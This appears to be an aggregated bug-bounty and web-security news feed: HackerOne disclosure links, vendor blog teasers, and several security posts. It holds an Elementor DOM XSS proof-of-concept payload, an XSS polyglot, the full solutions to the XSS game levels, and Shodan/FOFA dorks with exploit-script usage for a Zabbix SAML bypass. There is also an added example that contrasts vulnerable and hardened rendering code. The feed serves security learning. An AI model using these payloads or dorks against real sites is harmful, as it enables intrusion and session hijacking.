External service interaction (HTTP)
October 26, 2022 Node.js disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1632921
October 26, 2022 Yelp disclosed a bug submitted by raja404: https://hackerone.com/reports/1712240
October 26, 2022 8×8 disclosed a bug submitted by rajauzairabdullah: https://hackerone.com/reports/790846
October 26, 2022 Yelp disclosed a bug submitted by qualwin3001: https://hackerone.com/reports/1707616
October 26, 2022 Yelp disclosed a bug submitted by er_salil: https://hackerone.com/reports/1023773
October 26, 2022 U.S. Dept Of Defense disclosed a bug submitted by thpless: https://hackerone.com/reports/1624152 – Bounty: $500
October 26, 2022 Reddit disclosed a bug submitted by criptex: https://hackerone.com/reports/1051373 – Bounty: $5000
October 26, 2022 Adobe disclosed a bug submitted by gdattacker: https://hackerone.com/reports/1661914
October 26, 2022 MTN Group disclosed a bug submitted by possowski: https://hackerone.com/reports/1646248
October 26, 2022 Internet Bug Bounty disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1663788 – Bounty: $1200
October 26, 2022 Internet Bug Bounty disclosed a bug submitted by happyhacking123: https://hackerone.com/reports/1664019 – Bounty: $600
October 26, 2022 Have you ever wished Google Assistant could read you the articles in your Feedly? Now it can. Nick Felker has created a Google Assistant Action that integrates Google Assistant and Feedly. Thanks to the Feedly action, Google Assistant can list the headlines in your feeds, read specific articles, and even…
October 26, 2022 Easily track key business events like funding events, product launches, or partnerships. Industries are changing at a faster pace than ever. Keeping up with new threats and opportunities can be overwhelming and time-consuming. Today, we’re excited to announce a new Leo skill that lets you easily track key strategic moves…
October 26, 2022 We’re excited to launch a new version of the Feedly Web UI that improves the navigation and adds support for a cool dark theme. Here’s a quick demo of the new Feedly dark theme and left navigation bar updates: More visible Add Content (+) The profile and add content are…
October 26, 2022 The post New reward system to accelerate learning and growth on Detectify appeared first on Detectify Labs.
October 26, 2022 The post SSRF vulnerabilities and where to find them appeared first on Detectify Labs.
October 26, 2022 The post How To Hack Web Applications in 2022: Part 2 appeared first on Detectify Labs.
October 26, 2022 The post Module disclosures now available for hackers on Detectify Crowdsource appeared first on Detectify Labs.
October 26, 2022 The post Common Security Vulnerabilities in Core AWS Services: Exploitation and Mitigation appeared first on Detectify Labs.
October 26, 2022 The post Account hijacking using “dirty dancing” in sign-in OAuth-flows appeared first on Detectify Labs.
October 26, 2022 The post Hack with ‘goodfaith’ – A tool to automate and scale good faith hacking appeared first on Detectify Labs.
October 26, 2022 The post How to: Look for TLS private keys on Docker Hub appeared first on Detectify Labs.
October 26, 2022 The post Leveraging AWS QuickSight dashboards to visualize recon data appeared first on Detectify Labs.
October 26, 2022 The post How To Hack Web Applications in 2022: Part 1 appeared first on Detectify Labs.
October 26, 2022 A DOM-based (reflected) cross-site scripting (XSS) vulnerability, tracked as CVE-2022-29455, affects the Elementor Website Builder WordPress plugin in versions <= 3.5.5. 4websecurity.com has already reported the vulnerability to tens of thousands of WordPress sites running this version of the plugin. References: https://nvd.nist.gov/vuln/detail/CVE-2022-29455 ; https://rotem-bar.com/hacking-65-million-websites-greater-cve-2022-29455-elementor ; https://www.rotem-bar.com/elementor . PoC (proof of concept): the settings value in the URL fragment is Base64-encoded: https://example.com/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwOi8vIiwidmlkZW9UeXBlIjoiaG9zdGVkIiwidmlkZW9QYXJhbXMiOnsib25lcnJvciI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbikifX0= Decoded from…
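The following is an added example, not code from the write-up or from Elementor: it decodes the Base64 settings payload quoted in the PoC above, then contrasts an assumed vulnerable sink (every key of videoParams copied onto a video tag as an attribute, so "onerror" becomes an event handler) with an allowlisting version. The sink shape, the renderVideoUnsafe/renderVideoSafe function names, and the MIXED_SETTINGS input are assumptions made for illustration.

```javascript
// Added example (not from the write-up or the Elementor code base). The sink
// shape below is an ASSUMPTION used to illustrate the bug class, not Elementor's code.

// Payload exactly as it appears in the PoC URL fragment quoted above.
const PAYLOAD =
  "eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwOi8vIiwidmlkZW9UeXBlIjoiaG9zdGVkIiwidmlkZW9QYXJhbXMiOnsib25lcnJvciI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbikifX0=";

// Constructed input for the hardened path: a plausible URL plus one legitimate
// and one attacker-supplied parameter.
const MIXED_SETTINGS = {
  type: "video",
  url: "https://example.com/clip.mp4",
  videoType: "hosted",
  videoParams: { controls: "1", onerror: "alert(1)" },
};

// Parse the settings= value the way a client-side handler would: base64 -> JSON.
function decodeSettings(b64) {
  return JSON.parse(Buffer.from(b64, "base64").toString("utf8"));
}

// Minimal HTML attribute-value escaping.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// VULNERABLE (assumed pattern): attacker-controlled keys become attribute
// names, so "onerror" lands on the element and fires when the bogus src
// ("http://" in the PoC) fails to load.
function renderVideoUnsafe(settings) {
  const params = settings.videoParams || {};
  const attrs = Object.entries(params)
    .map(([k, v]) => `${k}="${v}"`)
    .join(" ");
  return `<video src="${settings.url}" ${attrs}></video>`;
}

// HARDENED: only known, non-event parameter names are honoured, every value
// is escaped, and the URL must parse and be http(s). Returns null on reject.
const ALLOWED_PARAMS = new Set(["autoplay", "loop", "muted", "controls"]);

function renderVideoSafe(settings) {
  let url;
  try {
    url = new URL(settings.url);
  } catch (e) {
    return null; // "http://" has no host and is rejected here
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") return null;
  const params = settings.videoParams || {};
  const attrs = Object.keys(params)
    .filter((k) => ALLOWED_PARAMS.has(k))
    .map((k) => `${k}="${escapeAttr(params[k])}"`)
    .join(" ");
  return `<video src="${escapeAttr(url.href)}"${attrs ? " " + attrs : ""}></video>`;
}

const settings = decodeSettings(PAYLOAD);
console.log(JSON.stringify(settings));
console.log(renderVideoUnsafe(settings));   // onerror handler present
console.log(renderVideoSafe(settings));     // null: URL rejected
console.log(renderVideoSafe(MIXED_SETTINGS)); // controls kept, onerror dropped
```

Run it with Node. The point of the allowlist is that attacker-controlled data never chooses an attribute name; escaping values alone would not stop this payload, because the dangerous part is the key "onerror", not its value.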
October 26, 2022 On Zabbix instances where SAML SSO authentication is enabled (not the default), session data can be modified by a malicious actor, because the user login stored in the session was not verified. Dorks: Shodan: http.favicon.hash:892542951 ; FOFA: app="ZABBIX-监控系统" && body="saml". Usage: nuclei -l target.txt -tags zabbix ; python3 zabbix_session_exp.py -t https:target.com…
October 26, 2022 You must have heard about time travel in movies, series and comics. Well, here we are. No, I'm not joking: you can travel back in time and fetch endpoints from web applications for further exploitation. Don't believe me? You will after travelling with TheTimeMachine. PS: Doesn't…
October 26, 2022 jaVasCript:/*-/*`/*`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>x3csVg/<sVg/oNloAd=alert()//>x3e
October 26, 2022 Penetration testers commonly use browser extensions to locate broken links and report them to the client, and the same extensions help determine whether a target website contains vulnerabilities that could lead to exploitation and theft of sensitive information. Here are the different Chrome extensions that are…
October 26, 2022 Hi guys, this is Neil Harvey Miñano, a newbie security researcher from the Philippines. This is my first write-up, and I am not good at XSS, so forgive all mistakes. It was 04/20/2021 and my first day of bug hunting. I'm still a newbie! Today I am going to share a reflected XSS vulnerability that…
October 26, 2022 Improper Access Control to Remote Code Execution (CVE-2020-8591). In this post I will explain how I compromised a whole system by exploiting an improper access control vulnerability in the popular Java-based MaaS software eG Manager, and how I escalated it to remote code execution. Impact: the improper access control weakness…
October 26, 2022 Speaking with the team at Open Bug Bounty was the highlight of her day for Aviva Zacks of Safety Detectives. She learned that their community-driven spirit is exactly what advantageously differentiates their project from the others out there. https://www.safetydetectives.com/blog/interview-open-bug-bounty/
October 26, 2022 https://xss-game.appspot.com/
Level #1: Hello, world of XSS
  URL: https://xss-game.appspot.com/level1
  Solution: <script>alert('xss')</script>
  Hint: inspect the source code of the page
Level #2: Persistence is key
  URL: https://xss-game.appspot.com/level2
  Solution: <img src=x onerror=alert('XSS')>
  Hint: the "welcome" post contains HTML
Level #3: That sinking feeling...
  URL: https://xss-game.appspot.com/level3/frame#1
  Solution: https://xss-game.appspot.com/level3/frame#1' onerror='alert("xss")'>
Level #4: Context matters
  URL: https://xss-game.appspot.com/level4/frame
  Solution: timer=');alert('xss
Level #5: Breaking protocol
  URL: https://xss-game.appspot.com/level5/frame
  Solution: https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('xss')
Level #6: Follow the X
  URL: https://xss-game.appspot.com/level6/frame#/static/gadget.js
  Solution: https://xss-game.appspot.com/level6/frame#data:text/plain,alert('xss')…
October 26, 2022 Hi, so today I'll cover some techniques for testing XSS. First of all, note these important things: copy-pasting XSS payloads doesn't work. PoC or GTFO: report triagers need a proper PoC to validate a report, and without one your report cannot be triaged. So…
October 26, 2022 Penetration Testing as a Service (PTaaS), much like the other renditions of centrally hosted Software as a Service technologies (SaaS), is about providing a more flexible, continuous and scalable pentesting service. While remaining distinct from bug bounty programs, PTaaS is a modern approach to the traditional pentesting format. How does Penetration…
October 26, 2022 Bug Bytes is a weekly newsletter curated by members of the bug bounty community. The second series is curated by InsiderPhD. Every week, she keeps us up to date with a comprehensive list of write-ups, tools, tutorials and resources. This issue covers the week from October 9th until October 15th. Intigriti…
October 26, 2022 Bug Bytes is a weekly newsletter curated by members of the bug bounty community. The second series is curated by InsiderPhD. Every week, she keeps us up to date with a comprehensive list of write-ups, tools, tutorials and resources. This issue covers the week from October 2nd until October 8th. Intigriti…
October 26, 2022 Intigriti, Europe’s leading crowdsourced security platform, today announced a significant expansion of its bug bounty platform offerings with the launch of Hybrid Pentesting. The Penetration Testing as a Service (PTaaS) solution combines the pay-for-impact approach of bug bounty programs with the dedicated resourcing strategy found in classic penetration testing. The…
October 26, 2022 As a cybersecurity company, it’s perhaps unsurprising that we’re passionate about ensuring the safety of data and assets. This, of course, goes beyond just providing it to our clients. As guardians of sensitive customer data, it is imperative that our own safety measures are constantly under review. This is why…
October 26, 2022 Welcome back everyone to Bug Bytes, the weekly newsletter curated by members of the Bug Bounty community! As you may have read in the last issue, the previous author of Bug Bytes, Mariem / PentesterLand, left Intigriti and passed the torch of Bug Bytes to whomever would take it up. Every…
October 26, 2022 The need for continuous security testing is quickly cementing bug bounty platforms as an integral part of cybersecurity infrastructure. However, it’s less common for cybersecurity technology and solution providers to run bug bounty programs in addition to their other offerings. This is not surprising, given the careful approach and expertise that…
October 26, 2022 Working in Intigriti’s product team means playing a defining role in the global uptake of crowdsourced security. Since 2016, we’ve enabled hackers to use their skills for good and provide essential continuous testing for businesses. You’ll gain first-hand experience of a scaling company within a flexible working environment. Join…
October 26, 2022 TL;DR Changelog 39: Communication is key. Communicating with others about a bug or vulnerability that has been found and submitted as a report is one of the key features a bug bounty platform needs. Communication between the relevant stakeholders should be quick, easy and transparent, but also provide some assurance…
October 26, 2022 After putting in-person live hacking events on hold due to social distancing regulations and travel restrictions, Yahoo made a ground-breaking comeback this month with their 1337UP0822 event. The global media and tech company combined forces with Intigriti to host their first in-person live hacking event in more than two years. …